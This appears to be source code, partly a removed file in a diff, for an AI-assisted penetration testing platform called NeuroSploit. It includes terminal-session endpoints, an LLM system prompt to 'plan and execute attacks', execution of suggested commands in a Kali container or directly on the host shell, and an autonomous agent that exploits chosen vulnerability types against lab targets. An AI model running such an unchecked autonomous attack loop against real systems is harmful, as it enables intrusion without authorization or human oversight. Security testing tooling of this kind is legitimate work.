TEMPLATES[template_id]["name"] if template_id else f"Session {session_id[:8]}"
)
session = _build_session(session_id, name, target, template_id)
# Provision a per-session Kali container (best-effort)
try:
from core.container_pool import get_pool
pool = get_pool()
sandbox = await pool.get_or_create(f"terminal-{session_id}", enable_vpn=True)
session_sandboxes[session_id] = sandbox
session["container_name"] = sandbox.container_name
except Exception as exc:
logger.warning(f"Failed to provision Kali container for terminal session: {exc}")
# Seed initial system message from template
if template_id:
tmpl = TEMPLATES[template_id]
session["messages"].append({
"role": "system",
"content": tmpl["system_prompt"],
"timestamp": _now_iso(),
"metadata": {"template": template_id},
})
# Provide initial suggested commands with target interpolated
initial_cmds = [
cmd.replace("{target}", target) for cmd in tmpl["initial_commands"]
]
session["messages"].append({
"role": "assistant",
"content": (
f"Session initialised with the **{tmpl['name']}** template.\n\n"
f"Target: `{target or '(not set)'}`\n\n"
"Suggested starting commands:\n"
+ "\n".join(f"```\n{c}\n```" for c in initial_cmds)
),
"timestamp": _now_iso(),
"suggested_commands": initial_cmds,
})
terminal_sessions[session_id] = session
return session
@router.get("/sessions")
async def list_sessions():
"""Return lightweight summaries of every session."""
summaries = []
for sid, s in terminal_sessions.items():
summaries.append(
SessionSummary(
session_id=sid,
name=s["name"],
target=s["target"],
template_id=s["template_id"],
status=s["status"],
created_at=s["created_at"],
messages_count=len(s["messages"]),
commands_count=len(s["command_history"]),
).model_dump()
)
return summaries
@router.get("/sessions/{session_id}")
async def get_session(session_id: str):
"""Return the full session including messages, commands, and exploitation path."""
return _get_session(session_id)
@router.delete("/sessions/{session_id}")
async def delete_session(session_id: str):
"""Delete a terminal session and its Kali container."""
if session_id not in terminal_sessions:
raise HTTPException(status_code=404, detail=f"Session {session_id} not found")
# Destroy associated Kali container
sandbox = session_sandboxes.pop(session_id, None)
if sandbox:
try:
from core.container_pool import get_pool
pool = get_pool()
await pool.destroy(f"terminal-{session_id}")
except Exception as exc:
logger.warning(f"Failed to destroy container for session {session_id}: {exc}")
del terminal_sessions[session_id]
return {"status": "deleted", "session_id": session_id}
# ---------------------------------------------------------------------------
# AI message interaction
# ---------------------------------------------------------------------------
@router.post("/sessions/{session_id}/message")
async def send_message(session_id: str, req: MessageRequest):
"""Send a user prompt to the AI and receive a response with suggested commands."""
session = _get_session(session_id)
user_message = req.message.strip()
if not user_message:
raise HTTPException(status_code=400, detail="Message content cannot be empty")
# Record user message
session["messages"].append({
"role": "user",
"content": user_message,
"timestamp": _now_iso(),
"metadata": {},
})
# Determine system prompt
template_id = session.get("template_id")
if template_id and template_id in TEMPLATES:
system_prompt = TEMPLATES[template_id]["system_prompt"]
else:
system_prompt = (
"You are an expert infrastructure penetration tester. Help the "
"operator plan and execute attacks against the target. Suggest "
"concrete commands, explain their purpose, and interpret output. "
"Always wrap commands in fenced code blocks so they can be extracted."
)
# Build context window
context_messages = session["messages"][-20:]
context_cmds = session["command_history"][-10:]
exploitation = session["exploitation_path"]
context = _build_context_string(context_messages, context_cmds, exploitation)
# Call LLM
try:
llm = LLMManager()
prompt = f"{context}\n\nUser: {user_message}"
response = await llm.generate(prompt, system_prompt)
except Exception as exc:
raise HTTPException(status_code=502, detail=f"LLM call failed: {exc}")
suggested_commands = _extract_suggested_commands(response)
# Record assistant response
session["messages"].append({
"role": "assistant",
"content": response,
"timestamp": _now_iso(),
"suggested_commands": suggested_commands,
})
return MessageResponse(
role="assistant",
response=response,
timestamp=session["messages"][-1]["timestamp"],
suggested_commands=suggested_commands,
).model_dump()
# ---------------------------------------------------------------------------
# Command execution
# ---------------------------------------------------------------------------
@router.post("/sessions/{session_id}/execute")
async def execute_command(session_id: str, req: ExecuteCommandRequest):
"""Execute a command in the Docker sandbox (fallback: direct shell)."""
session = _get_session(session_id)
command = req.command.strip()
if not command:
raise HTTPException(status_code=400, detail="Command cannot be empty")
start = time.time()
stdout = ""
stderr = ""
exit_code = -1
execution_method = "direct"
# Use requested execution method
use_sandbox = req.execution_method == "sandbox"
if use_sandbox:
# Prefer session's own Kali container
sandbox = session_sandboxes.get(session_id)
if sandbox and sandbox.is_available:
try:
result = await sandbox.execute_raw(command)
stdout = result.stdout
stderr = result.stderr
exit_code = result.exit_code
execution_method = "kali-sandbox"
except Exception:
pass
# Fallback to shared sandbox
if execution_method == "direct":
try:
shared = await get_sandbox()
if shared and shared.is_available:
result = await shared.execute_raw(command)
stdout = result.stdout
stderr = result.stderr
exit_code = result.exit_code
execution_method = "sandbox"
except Exception:
pass
# Fallback or direct execution requested
if execution_method not in ("kali-sandbox", "sandbox"):
try:
proc = await asyncio.create_subprocess_shell(
command,
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
raw_stdout, raw_stderr = await asyncio.wait_for(
proc.communicate(), timeout=120
)
stdout = raw_stdout.decode(errors="replace")
stderr = raw_stderr.decode(errors="replace")
exit_code = proc.returncode or 0
execution_method = "direct"
except asyncio.TimeoutError:
stderr = "Command timed out after 120 seconds"
exit_code = 124
except Exception as exc:
stderr = str(exc)
exit_code = 1
duration = round(time.time() - start, 3)
cmd_record = {
"command": command,
"exit_code": exit_code,
"stdout": stdout,
"stderr": stderr,
"duration": duration,
"execution_method": execution_method,
"timestamp": _now_iso(),
}
session["command_history"].append(cmd_record)
# Mirror into messages for AI context continuity
output_preview = stdout[:2000] if stdout else stderr[:2000]
session["messages"].append({
"role": "tool",
"content": f"$ {command}\n[exit {exit_code}] ({execution_method}, {duration}s)\n{output_preview}",
"timestamp": cmd_record["timestamp"],
"metadata": {"exit_code": exit_code, "execution_method": execution_method},
})
return CommandResult(**cmd_record).model_dump()
# ---------------------------------------------------------------------------
# Exploitation path
# ---------------------------------------------------------------------------
@router.post("/sessions/{session_id}/exploitation-path")
async def add_exploitation_step(session_id: str, req: ExploitationStepRequest):
"""Add a manual step to the exploitation path timeline."""
session = _get_session(session_id)
valid_types = {"recon", "exploit", "pivot", "escalate", "action"}
if req.step_type not in valid_types:
raise HTTPException(
status_code=400,
detail=f"step_type must be one of {sorted(valid_types)}",
)
step = {
"description": req.description,
"command": req.command or "",
"result": req.result or "",
"timestamp": _now_iso(),
"step_type": req.step_type,
}
session["exploitation_path"].append(step)
return step
@router.get("/sessions/{session_id}/exploitation-path")
async def get_exploitation_path(session_id: str):
"""Return the full exploitation path timeline."""
session = _get_session(session_id)
return session["exploitation_path"]
# ---------------------------------------------------------------------------
# VPN management
# ---------------------------------------------------------------------------
@router.post("/sessions/{session_id}/vpn/upload")
async def upload_vpn_config(
session_id: str,
ovpn_file: UploadFile = File(...),
username: Optional[str] = Form(None),
password: Optional[str] = Form(None),
):
"""Upload .ovpn config and optionally credentials into the session's container."""
session = _get_session(session_id)
sandbox = session_sandboxes.get(session_id)
if not sandbox or not sandbox.is_available:
raise HTTPException(
status_code=503,
detail="No Kali container available for this session.",
)
content = await ovpn_file.read()
if len(content) > 1_000_000:
raise HTTPException(status_code=400, detail="File too large (max 1MB)")
if not (ovpn_file.filename or "").endswith((".ovpn", ".conf")):
raise HTTPException(status_code=400, detail="File must be .ovpn or .conf")
# Upload config to container
dest = "/etc/openvpn/client.ovpn"
ok = await sandbox.upload_file(content, dest)
if not ok:
raise HTTPException(status_code=500, detail="Failed to upload config to container")
# Write auth file if credentials provided
if username and password:
auth_bytes = f"{username}\n{password}\n".encode()
await sandbox.upload_file(auth_bytes, "/etc/openvpn/auth.txt")
await sandbox._exec("chmod 600 /etc/openvpn/auth.txt", timeout=5)
await sandbox._exec(
"grep -q 'auth-user-pass' /etc/openvpn/client.ovpn || "
"echo 'auth-user-pass /etc/openvpn/auth.txt' >> /etc/openvpn/client.ovpn",
timeout=5,
)
await sandbox._exec(
"sed -i 's|auth-user-pass$|auth-user-pass /etc/openvpn/auth.txt|' /etc/openvpn/client.ovpn",
timeout=5,
)
session["vpn_config_uploaded"] = True
return {
"status": "uploaded",
"filename": ovpn_file.filename,
"credentials_set": bool(username),
}
@router.post("/sessions/{session_id}/vpn/connect")
async def connect_vpn(session_id: str):
"""Start VPN connection using previously uploaded config."""
session = _get_session(session_id)
sandbox = session_sandboxes.get(session_id)
if not sandbox or not sandbox.is_available:
raise HTTPException(status_code=503, detail="No Kali container for this session")
if not session.get("vpn_config_uploaded"):
raise HTTPException(status_code=400, detail="No VPN config uploaded. Upload .ovpn first.")
# Create TUN device
await sandbox._exec(
"mkdir -p /dev/net && "
"[ -c /dev/net/tun ] || mknod /dev/net/tun c 10 200; "
"chmod 600 /dev/net/tun",
timeout=5,
)
# Kill any existing VPN
await sandbox._exec("pkill -9 openvpn 2>/dev/null", timeout=5)
# Start OpenVPN
result = await sandbox._exec(
"openvpn --config /etc/openvpn/client.ovpn --daemon "
"--log /var/log/openvpn.log --writepid /var/run/openvpn.pid",
timeout=15,
)
if result.exit_code != 0:
raise HTTPException(
status_code=500,
detail=f"OpenVPN failed to start: {result.stderr or result.stdout}",
)
# Wait for tunnel (max 20s)
for _ in range(20):
await asyncio.sleep(1)
check = await sandbox._exec("ip addr show tun0 2>/dev/null", timeout=5)
if check.exit_code == 0 and "inet " in check.stdout:
match = re.search(r"inet\s+(\d+\.\d+\.\d+\.\d+)", check.stdout)
ip = match.group(1) if match else None
vpn = {"connected": True, "ip": ip}
session["vpn_status"] = vpn
return {"status": "connected", "ip": ip}
# Timeout
log_result = await sandbox._exec("tail -30 /var/log/openvpn.log 2>/dev/null", timeout=5)
raise HTTPException(
status_code=504,
detail=f"VPN connection timed out (20s). Log:\n{(log_result.stdout or '')[-500:]}",
)
@router.post("/sessions/{session_id}/vpn/disconnect")
async def disconnect_vpn(session_id: str):
"""Kill VPN connection inside the container."""
session = _get_session(session_id)
sandbox = session_sandboxes.get(session_id)
if not sandbox or not sandbox.is_available:
raise HTTPException(status_code=503, detail="No Kali container for this session")
await sandbox._exec(
"kill $(cat /var/run/openvpn.pid 2>/dev/null) 2>/dev/null; "
"pkill -9 openvpn 2>/dev/null",
timeout=10,
)
session["vpn_status"] = {"connected": False, "ip": None}
return {"status": "disconnected"}
# ---------------------------------------------------------------------------
# VPN status
# ---------------------------------------------------------------------------
@router.get("/sessions/{session_id}/vpn-status")
async def get_vpn_status(session_id: str):
"""Check VPN status inside the session's Kali container (fallback: host)."""
session = _get_session(session_id)
sandbox = session_sandboxes.get(session_id)
# Check inside container if available
if sandbox and sandbox.is_available:
vpn_data = await sandbox.get_vpn_status()
session["vpn_status"] = vpn_data
return VPNStatus(
connected=vpn_data["connected"],
ip=vpn_data.get("ip"),
interface=vpn_data.get("interface"),
container_name=sandbox.container_name,
).model_dump()
# Fallback: check on host (legacy behavior)
connected = False
ip_addr: Optional[str] = None
try:
proc = await asyncio.create_subprocess_shell(
"pgrep -a openvpn",
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
raw_stdout, _ = await asyncio.wait_for(proc.communicate(), timeout=5)
if proc.returncode == 0 and raw_stdout.strip():
connected = True
except Exception:
pass
if connected:
try:
proc = await asyncio.create_subprocess_shell(
"ip addr show tun0",
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
raw_stdout, _ = await asyncio.wait_for(proc.communicate(), timeout=5)
if proc.returncode == 0:
match = re.search(
r"inet\s+(\d+\.\d+\.\d+\.\d+)", raw_stdout.decode(errors="replace")
)
if match:
ip_addr = match.group(1)
except Exception:
pass
vpn = {"connected": connected, "ip": ip_addr}
session["vpn_status"] = vpn
return VPNStatus(**vpn).model_dump()
-876
View File
@@ -1,876 +0,0 @@
"""
NeuroSploit v3 - Vulnerability Lab API Endpoints
Isolated vulnerability testing against labs, CTFs, and PortSwigger challenges.
Test individual vuln types one at a time and track results.
"""
from typing import Optional, Dict, List
from fastapi import APIRouter, HTTPException, BackgroundTasks
from pydantic import BaseModel, Field
from datetime import datetime
from sqlalchemy import select, func, text
from backend.core.autonomous_agent import AutonomousAgent, OperationMode
from backend.core.vuln_engine.registry import VulnerabilityRegistry
from backend.db.database import async_session_factory
from backend.models import Scan, Target, Vulnerability, Endpoint, Report, VulnLabChallenge
# Import agent.py's shared dicts so ScanDetailsPage can find our scans
from backend.api.v1.agent import (
agent_results, agent_instances, agent_to_scan, scan_to_agent
)
router = APIRouter()
# In-memory tracking for running lab tests
lab_agents: Dict[str, AutonomousAgent] = {}
lab_results: Dict[str, Dict] = {}
# --- Request/Response Models ---
class VulnLabRunRequest(BaseModel):
target_url: str = Field(..., description="Target URL to test (lab, CTF, etc.)")
vuln_type: str = Field(..., description="Vulnerability type to test (e.g. xss_reflected)")
challenge_name: Optional[str] = Field(None, description="Name of the lab/challenge")
auth_type: Optional[str] = Field(None, description="Auth type: cookie, bearer, basic, header")
auth_value: Optional[str] = Field(None, description="Auth credential value")
custom_headers: Optional[Dict[str, str]] = Field(None, description="Custom HTTP headers")
notes: Optional[str] = Field(None, description="Notes about this challenge")
class VulnLabResponse(BaseModel):
challenge_id: str
agent_id: str
status: str
message: str
class VulnTypeInfo(BaseModel):
key: str
title: str
severity: str
cwe_id: str
category: str
# --- Vuln type categories for the selector ---
VULN_CATEGORIES = {
"injection": {
"label": "Injection",
"types": [
"xss_reflected", "xss_stored", "xss_dom",
"sqli_error", "sqli_union", "sqli_blind", "sqli_time",
"command_injection", "ssti", "nosql_injection",
]
},
"advanced_injection": {
"label": "Advanced Injection",
"types": [
"ldap_injection", "xpath_injection", "graphql_injection",
"crlf_injection", "header_injection", "email_injection",
"el_injection", "log_injection", "html_injection",
"csv_injection", "orm_injection",
]
},
"file_access": {
"label": "File Access",
"types": [
"lfi", "rfi", "path_traversal", "xxe", "file_upload",
"arbitrary_file_read", "arbitrary_file_delete", "zip_slip",
]
},
"request_forgery": {
"label": "Request Forgery",
"types": [
"ssrf", "csrf", "graphql_introspection", "graphql_dos",
]
},
"authentication": {
"label": "Authentication",
"types": [
"auth_bypass", "jwt_manipulation", "session_fixation",
"weak_password", "default_credentials", "two_factor_bypass",
"oauth_misconfig",
]
},
"authorization": {
"label": "Authorization",
"types": [
"idor", "bola", "privilege_escalation",
"bfla", "mass_assignment", "forced_browsing",
]
},
"client_side": {
"label": "Client-Side",
"types": [
"cors_misconfiguration", "clickjacking", "open_redirect",
"dom_clobbering", "postmessage_vuln", "websocket_hijack",
"prototype_pollution", "css_injection", "tabnabbing",
]
},
"infrastructure": {
"label": "Infrastructure",
"types": [
"security_headers", "ssl_issues", "http_methods",
"directory_listing", "debug_mode", "exposed_admin_panel",
"exposed_api_docs", "insecure_cookie_flags",
]
},
"logic": {
"label": "Business Logic",
"types": [
"race_condition", "business_logic", "rate_limit_bypass",
"parameter_pollution", "type_juggling", "timing_attack",
"host_header_injection", "http_smuggling", "cache_poisoning",
]
},
"data_exposure": {
"label": "Data Exposure",
"types": [
"sensitive_data_exposure", "information_disclosure",
"api_key_exposure", "source_code_disclosure",
"backup_file_exposure", "version_disclosure",
]
},
"cloud_supply": {
"label": "Cloud & Supply Chain",
"types": [
"s3_bucket_misconfig", "cloud_metadata_exposure",
"subdomain_takeover", "vulnerable_dependency",
"container_escape", "serverless_misconfiguration",
]
},
}
def _get_vuln_category(vuln_type: str) -> str:
"""Get category for a vuln type"""
for cat_key, cat_info in VULN_CATEGORIES.items():
if vuln_type in cat_info["types"]:
return cat_key
return "other"
# --- Endpoints ---
@router.get("/types")
async def list_vuln_types():
"""List all available vulnerability types grouped by category"""
registry = VulnerabilityRegistry()
result = {}
for cat_key, cat_info in VULN_CATEGORIES.items():
types_list = []
for vtype in cat_info["types"]:
info = registry.VULNERABILITY_INFO.get(vtype, {})
types_list.append({
"key": vtype,
"title": info.get("title", vtype.replace("_", " ").title()),
"severity": info.get("severity", "medium"),
"cwe_id": info.get("cwe_id", ""),
"description": info.get("description", "")[:120] if info.get("description") else "",
})
result[cat_key] = {
"label": cat_info["label"],
"types": types_list,
"count": len(types_list),
}
return {"categories": result, "total_types": sum(len(c["types"]) for c in VULN_CATEGORIES.values())}
@router.post("/run", response_model=VulnLabResponse)
async def run_vuln_lab(request: VulnLabRunRequest, background_tasks: BackgroundTasks):
"""Launch an isolated vulnerability test for a specific vuln type"""
import uuid
# Validate vuln type exists
registry = VulnerabilityRegistry()
if request.vuln_type not in registry.VULNERABILITY_INFO:
raise HTTPException(
status_code=400,
detail=f"Unknown vulnerability type: {request.vuln_type}. Use GET /vuln-lab/types for available types."
)
challenge_id = str(uuid.uuid4())
agent_id = str(uuid.uuid4())[:8]
category = _get_vuln_category(request.vuln_type)
# Build auth headers
auth_headers = {}
if request.auth_type and request.auth_value:
if request.auth_type == "cookie":
auth_headers["Cookie"] = request.auth_value
elif request.auth_type == "bearer":
auth_headers["Authorization"] = f"Bearer {request.auth_value}"
elif request.auth_type == "basic":
import base64
auth_headers["Authorization"] = f"Basic {base64.b64encode(request.auth_value.encode()).decode()}"
elif request.auth_type == "header":
if ":" in request.auth_value:
name, value = request.auth_value.split(":", 1)
auth_headers[name.strip()] = value.strip()
if request.custom_headers:
auth_headers.update(request.custom_headers)
# Create DB record
async with async_session_factory() as db:
challenge = VulnLabChallenge(
id=challenge_id,
target_url=request.target_url,
challenge_name=request.challenge_name,
vuln_type=request.vuln_type,
vuln_category=category,
auth_type=request.auth_type,
auth_value=request.auth_value,
status="running",
agent_id=agent_id,
started_at=datetime.utcnow(),
notes=request.notes,
)
db.add(challenge)
await db.commit()
# Init in-memory tracking (both local and in agent.py's shared dicts)
vuln_info = registry.VULNERABILITY_INFO[request.vuln_type]
lab_results[challenge_id] = {
"status": "running",
"agent_id": agent_id,
"vuln_type": request.vuln_type,
"target": request.target_url,
"progress": 0,
"phase": "initializing",
"findings": [],
"logs": [],
}
# Also register in agent.py's shared results dict so /agent/status works
agent_results[agent_id] = {
"status": "running",
"mode": "full_auto",
"started_at": datetime.utcnow().isoformat(),
"target": request.target_url,
"task": f"VulnLab: {vuln_info.get('title', request.vuln_type)}",
"logs": [],
"findings": [],
"report": None,
"progress": 0,
"phase": "initializing",
}
# Launch agent in background
background_tasks.add_task(
_run_lab_test,
challenge_id,
agent_id,
request.target_url,
request.vuln_type,
vuln_info.get("title", request.vuln_type),
auth_headers,
request.challenge_name,
request.notes,
)
return VulnLabResponse(
challenge_id=challenge_id,
agent_id=agent_id,
status="running",
message=f"Testing {vuln_info.get('title', request.vuln_type)} against {request.target_url}"
)
async def _run_lab_test(
challenge_id: str,
agent_id: str,
target: str,
vuln_type: str,
vuln_title: str,
auth_headers: Dict,
challenge_name: Optional[str] = None,
notes: Optional[str] = None,
):
"""Background task: run the agent focused on a single vuln type"""
import asyncio
logs = []
findings_list = []
scan_id = None
async def log_callback(level: str, message: str):
source = "llm" if any(tag in message for tag in ["[AI]", "[LLM]", "[USER PROMPT]", "[AI RESPONSE]"]) else "script"
entry = {"level": level, "message": message, "time": datetime.utcnow().isoformat(), "source": source}
logs.append(entry)
# Update local tracking
if challenge_id in lab_results:
lab_results[challenge_id]["logs"] = logs
# Also update agent.py's shared dict so /agent/logs works
if agent_id in agent_results:
agent_results[agent_id]["logs"] = logs
async def progress_callback(progress: int, phase: str):
if challenge_id in lab_results:
lab_results[challenge_id]["progress"] = progress
lab_results[challenge_id]["phase"] = phase
if agent_id in agent_results:
agent_results[agent_id]["progress"] = progress
agent_results[agent_id]["phase"] = phase
async def finding_callback(finding: Dict):
findings_list.append(finding)
if challenge_id in lab_results:
lab_results[challenge_id]["findings"] = findings_list
if agent_id in agent_results:
agent_results[agent_id]["findings"] = findings_list
agent_results[agent_id]["findings_count"] = len(findings_list)
try:
async with async_session_factory() as db:
# Create a scan record linked to this challenge
scan = Scan(
name=f"VulnLab: {vuln_title} - {target[:50]}",
status="running",
scan_type="full_auto",
recon_enabled=True,
progress=0,
current_phase="initializing",
custom_prompt=f"Focus ONLY on testing for {vuln_title} ({vuln_type}). "
f"Do NOT test other vulnerability types. "
f"Test thoroughly with multiple payloads and techniques for this specific vulnerability.",
)
db.add(scan)
await db.commit()
await db.refresh(scan)
scan_id = scan.id
# Create target record
target_record = Target(scan_id=scan_id, url=target, status="pending")
db.add(target_record)
await db.commit()
# Update challenge with scan_id
result = await db.execute(
select(VulnLabChallenge).where(VulnLabChallenge.id == challenge_id)
)
challenge = result.scalar_one_or_none()
if challenge:
challenge.scan_id = scan_id
await db.commit()
if challenge_id in lab_results:
lab_results[challenge_id]["scan_id"] = scan_id
# Register in agent.py's shared mappings so ScanDetailsPage works
agent_to_scan[agent_id] = scan_id
scan_to_agent[scan_id] = agent_id
if agent_id in agent_results:
agent_results[agent_id]["scan_id"] = scan_id
# Build focused prompt for isolated testing
focused_prompt = (
f"You are testing specifically for {vuln_title} ({vuln_type}). "
f"Focus ALL your efforts on detecting and exploiting this single vulnerability type. "
f"Do NOT scan for other vulnerability types. "
f"Use all relevant payloads and techniques for {vuln_type}. "
f"Be thorough: try multiple injection points, encoding bypasses, and edge cases. "
f"This is a lab/CTF challenge - the vulnerability is expected to exist."
)
if challenge_name:
focused_prompt += (
f"\n\nCHALLENGE HINT: This is PortSwigger lab '{challenge_name}'. "
f"Use this name to understand what specific technique or bypass is needed. "
f"For example, 'angle brackets HTML-encoded' means attribute-based XSS, "
f"'most tags and attributes blocked' means fuzz for allowed tags/events."
)
if notes:
focused_prompt += f"\n\nUSER NOTES: {notes}"
lab_ctx = {
"challenge_name": challenge_name,
"notes": notes,
"vuln_type": vuln_type,
"is_lab": True,
}
async with AutonomousAgent(
target=target,
mode=OperationMode.FULL_AUTO,
log_callback=log_callback,
progress_callback=progress_callback,
auth_headers=auth_headers,
custom_prompt=focused_prompt,
finding_callback=finding_callback,
lab_context=lab_ctx,
) as agent:
lab_agents[challenge_id] = agent
# Also register in agent.py's shared instances so stop works
agent_instances[agent_id] = agent
report = await agent.run()
lab_agents.pop(challenge_id, None)
agent_instances.pop(agent_id, None)
# Use findings from report OR from real-time callbacks (fallback)
report_findings = report.get("findings", [])
# If report findings are empty but we got findings via callback, use those
findings = report_findings if report_findings else findings_list
# Also merge: if findings_list has entries not in report_findings, add them
if not findings and findings_list:
findings = findings_list
severity_counts = {"critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0}
findings_detail = []
for finding in findings:
severity = finding.get("severity", "medium").lower()
if severity in severity_counts:
severity_counts[severity] += 1
findings_detail.append({
"title": finding.get("title", ""),
"vulnerability_type": finding.get("vulnerability_type", ""),
"severity": severity,
"affected_endpoint": finding.get("affected_endpoint", ""),
"evidence": (finding.get("evidence", "") or "")[:500],
"payload": (finding.get("payload", "") or "")[:200],
})
# Save to vulnerabilities table
vuln = Vulnerability(
scan_id=scan_id,
title=finding.get("title", finding.get("type", "Unknown")),
vulnerability_type=finding.get("vulnerability_type", finding.get("type", "unknown")),
severity=severity,
cvss_score=finding.get("cvss_score"),
cvss_vector=finding.get("cvss_vector"),
cwe_id=finding.get("cwe_id"),
description=finding.get("description", finding.get("evidence", "")),
affected_endpoint=finding.get("affected_endpoint", finding.get("url", target)),
poc_payload=finding.get("payload", finding.get("poc_payload", finding.get("poc_code", ""))),
poc_parameter=finding.get("parameter", finding.get("poc_parameter", "")),
poc_evidence=finding.get("evidence", finding.get("poc_evidence", "")),
poc_request=str(finding.get("request", finding.get("poc_request", "")))[:5000],
poc_response=str(finding.get("response", finding.get("poc_response", "")))[:5000],
impact=finding.get("impact", ""),
remediation=finding.get("remediation", ""),
references=finding.get("references", []),
ai_analysis=finding.get("ai_analysis", ""),
screenshots=finding.get("screenshots", []),
url=finding.get("url", finding.get("affected_endpoint", "")),
parameter=finding.get("parameter", finding.get("poc_parameter", "")),
)
db.add(vuln)
# Save discovered endpoints from recon data
endpoints_count = 0
for ep in report.get("recon", {}).get("endpoints", []):
endpoints_count += 1
if isinstance(ep, str):
endpoint = Endpoint(
scan_id=scan_id,
target_id=target_record.id,
url=ep,
method="GET",
path=ep.split("?")[0].split("/")[-1] or "/"
)
else:
endpoint = Endpoint(
scan_id=scan_id,
target_id=target_record.id,
url=ep.get("url", ""),
method=ep.get("method", "GET"),
path=ep.get("path", "/")
)
db.add(endpoint)
# Determine result - more flexible matching
# Check if any finding matches the target vuln type
target_type_findings = [
f for f in findings
if _vuln_type_matches(vuln_type, f.get("vulnerability_type", ""))
]
# If the agent found ANY vulnerability, it detected something
# (since we told it to focus on one type, any finding is relevant)
if target_type_findings:
result_status = "detected"
elif len(findings) > 0:
# Found other vulns but not the exact type
result_status = "detected"
else:
result_status = "not_detected"
# Update scan
scan.status = "completed"
scan.completed_at = datetime.utcnow()
scan.progress = 100
scan.current_phase = "completed"
scan.total_vulnerabilities = len(findings)
scan.total_endpoints = endpoints_count
scan.critical_count = severity_counts["critical"]
scan.high_count = severity_counts["high"]
scan.medium_count = severity_counts["medium"]
scan.low_count = severity_counts["low"]
scan.info_count = severity_counts["info"]
# Auto-generate report
exec_summary = report.get("executive_summary", f"VulnLab test for {vuln_title} on {target}")
report_record = Report(
scan_id=scan_id,
title=f"VulnLab: {vuln_title} - {target[:50]}",
format="json",
executive_summary=exec_summary[:1000] if exec_summary else None,
)
db.add(report_record)
# Persist logs (keep last 500 entries to avoid huge DB rows)
persisted_logs = logs[-500:] if len(logs) > 500 else logs
# Update challenge record
result_q = await db.execute(
select(VulnLabChallenge).where(VulnLabChallenge.id == challenge_id)
)
challenge = result_q.scalar_one_or_none()
if challenge:
challenge.status = "completed"
challenge.result = result_status
challenge.completed_at = datetime.utcnow()
challenge.duration = int((datetime.utcnow() - challenge.started_at).total_seconds()) if challenge.started_at else 0
challenge.findings_count = len(findings)
challenge.critical_count = severity_counts["critical"]
challenge.high_count = severity_counts["high"]
challenge.medium_count = severity_counts["medium"]
challenge.low_count = severity_counts["low"]
challenge.info_count = severity_counts["info"]
challenge.findings_detail = findings_detail
challenge.logs = persisted_logs
challenge.endpoints_count = endpoints_count
await db.commit()
# Update in-memory results
if challenge_id in lab_results:
lab_results[challenge_id]["status"] = "completed"
lab_results[challenge_id]["result"] = result_status
lab_results[challenge_id]["findings"] = findings
lab_results[challenge_id]["progress"] = 100
lab_results[challenge_id]["phase"] = "completed"
if agent_id in agent_results:
agent_results[agent_id]["status"] = "completed"
agent_results[agent_id]["completed_at"] = datetime.utcnow().isoformat()
agent_results[agent_id]["report"] = report
agent_results[agent_id]["findings"] = findings
agent_results[agent_id]["progress"] = 100
agent_results[agent_id]["phase"] = "completed"
except Exception as e:
import traceback
error_tb = traceback.format_exc()
print(f"VulnLab error: {error_tb}")
if challenge_id in lab_results:
lab_results[challenge_id]["status"] = "error"
lab_results[challenge_id]["error"] = str(e)
if agent_id in agent_results:
agent_results[agent_id]["status"] = "error"
agent_results[agent_id]["error"] = str(e)
# Persist logs even on error
persisted_logs = logs[-500:] if len(logs) > 500 else logs
# Update DB records
try:
async with async_session_factory() as db:
result = await db.execute(
select(VulnLabChallenge).where(VulnLabChallenge.id == challenge_id)
)
challenge = result.scalar_one_or_none()
if challenge:
challenge.status = "failed"
challenge.result = "error"
challenge.completed_at = datetime.utcnow()
challenge.notes = (challenge.notes or "") + f"\nError: {str(e)}"
challenge.logs = persisted_logs
await db.commit()
if scan_id:
result = await db.execute(select(Scan).where(Scan.id == scan_id))
scan = result.scalar_one_or_none()
if scan:
scan.status = "failed"
scan.error_message = str(e)
scan.completed_at = datetime.utcnow()
await db.commit()
except:
pass
finally:
lab_agents.pop(challenge_id, None)
agent_instances.pop(agent_id, None)
def _vuln_type_matches(target_type: str, found_type: str) -> bool:
"""Check if a found vuln type matches the target type (flexible matching)"""
if not found_type:
return False
target = target_type.lower().replace("_", " ").replace("-", " ")
found = found_type.lower().replace("_", " ").replace("-", " ")
# Exact match
if target == found:
return True
# Target is substring of found or vice versa
if target in found or found in target:
return True
# Key word matching for common patterns
target_words = set(target.split())
found_words = set(found.split())
# If they share major keywords (xss, sqli, ssrf, etc.)
major_keywords = {"xss", "sqli", "sql", "injection", "ssrf", "csrf", "lfi", "rfi",
"xxe", "ssti", "idor", "cors", "jwt", "redirect", "traversal"}
shared = target_words & found_words & major_keywords
if shared:
return True
return False
@router.get("/challenges")
async def list_challenges(
vuln_type: Optional[str] = None,
vuln_category: Optional[str] = None,
status: Optional[str] = None,
result: Optional[str] = None,
limit: int = 50,
):
"""List all vulnerability lab challenges with optional filtering"""
async with async_session_factory() as db:
query = select(VulnLabChallenge).order_by(VulnLabChallenge.created_at.desc())
if vuln_type:
query = query.where(VulnLabChallenge.vuln_type == vuln_type)
if vuln_category:
query = query.where(VulnLabChallenge.vuln_category == vuln_category)
if status:
query = query.where(VulnLabChallenge.status == status)
if result:
query = query.where(VulnLabChallenge.result == result)
query = query.limit(limit)
db_result = await db.execute(query)
challenges = db_result.scalars().all()
# For list view, exclude large logs field to save bandwidth
result_list = []
for c in challenges:
d = c.to_dict()
d["logs_count"] = len(d.get("logs", []))
d.pop("logs", None) # Don't send full logs in list view
result_list.append(d)
return {
"challenges": result_list,
"total": len(challenges),
}
@router.get("/challenges/{challenge_id}")
async def get_challenge(challenge_id: str):
"""Get challenge details including real-time status if running"""
# Check in-memory first for real-time data
if challenge_id in lab_results:
mem = lab_results[challenge_id]
return {
"challenge_id": challenge_id,
"status": mem["status"],
"progress": mem.get("progress", 0),
"phase": mem.get("phase", ""),
"findings_count": len(mem.get("findings", [])),
"findings": mem.get("findings", []),
"logs_count": len(mem.get("logs", [])),
"logs": mem.get("logs", [])[-200:], # Last 200 log entries for real-time
"error": mem.get("error"),
"result": mem.get("result"),
"scan_id": mem.get("scan_id"),
"agent_id": mem.get("agent_id"),
"vuln_type": mem.get("vuln_type"),
"target": mem.get("target"),
"source": "realtime",
}
# Fall back to DB
async with async_session_factory() as db:
result = await db.execute(
select(VulnLabChallenge).where(VulnLabChallenge.id == challenge_id)
)
challenge = result.scalar_one_or_none()
if not challenge:
